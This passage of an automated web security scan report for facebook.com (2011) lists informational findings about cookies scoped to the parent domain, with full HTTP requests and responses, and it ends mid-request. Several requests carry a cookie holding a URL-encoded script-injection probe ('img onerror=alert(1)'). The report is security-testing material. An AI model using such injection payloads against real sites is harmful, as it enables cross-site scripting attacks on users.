Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/register/logging.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /ajax/register/logging.php?__a=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
Origin: http://www.facebook.com
X-SVN-Rev: 374220
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613617025%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613618111%2C%22act%22%2C1304613617025%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fajax%2Freg_birthday_help.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C437%2C508%2C12%2C981%2C16%5D
Content-Length: 111

action=postload_focus&reg_instance=nozCTU1UnNH2U_CPdhUk4wOq&abtest_registration_group=1&fb_dtsg=yeP5w&lsd=zTWKd

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 34
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-Frame-Options: DENY
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.52.198.51
X-Cnection: close
Date: Thu, 05 May 2011 11:43:30 GMT

for (;;);{"__ar":1,"payload":null}

10.28. http://www.facebook.com/aol

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aol

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aol HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.63
Connection: close
Date: Thu, 05 May 2011 11:40:09 GMT
Content-Length: 39885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.29. http://www.facebook.com/aolradio

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aolradio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aolradio HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.33
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 34803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.30. http://www.facebook.com/badges

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badges HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.119
Connection: close
Date: Thu, 05 May 2011 10:56:34 GMT
Content-Length: 0


10.31. http://www.facebook.com/burkerkink

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /burkerkink

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /burkerkink HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.32. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 10:56:36 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.222.101
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 0


10.33. http://www.facebook.com/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.34. http://www.facebook.com/deedee.perez1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /deedee.perez1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /deedee.perez1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.35. http://www.facebook.com/directory/pages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.36. http://www.facebook.com/directory/people/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.37. http://www.facebook.com/facebook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.157.59
Connection: close
Date: Thu, 05 May 2011 11:43:00 GMT
Content-Length: 159754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.38. http://www.facebook.com/fayse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /fayse

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fayse HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.39. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.40. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
